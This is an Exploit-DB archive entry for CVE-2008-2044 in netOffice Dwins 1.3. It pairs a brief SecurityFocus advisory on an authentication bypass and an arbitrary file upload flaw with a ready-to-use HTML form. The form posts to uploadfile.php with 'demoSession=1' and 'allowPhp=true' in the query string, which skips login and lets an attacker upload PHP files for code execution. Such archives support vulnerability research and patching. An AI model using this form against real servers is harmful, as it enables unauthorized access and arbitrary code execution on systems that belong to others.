netOffice Dwins 1.3 - Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability

2008-02-29T00:00:00
ID EDB-ID:31317
Type exploitdb
Reporter RawSecurity.org
Modified 2008-02-29T00:00:00

Description

netOffice Dwins 1.3 Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability. CVE-2008-2044 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/28051/info

netOffice Dwins is prone to a vulnerability that allows attackers to bypass authentication as well as a vulnerability that allows attackers to upload arbitrary files. These issues occur because the application fails to adequately sanitize user-supplied input.

Attackers can leverage these issues to gain unauthorized access to the application and to execute arbitrary code in the context of the application.

These issues affect Dwins 1.3 p2; other versions may also be affected. 

<form accept-charset="UNKNOWN" method="POST" action="http://www.example.com/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments :</th><td><textarea cols="60" name="commentsField" rows="6"></textarea></td></tr> <tr><th>Upload :</th><td><input size="35" value="" name="upload" type="file"></td></tr> <tr><th> </th><td><input name="submit" type="submit" value="Save"><br><br></td></tr></table> </form>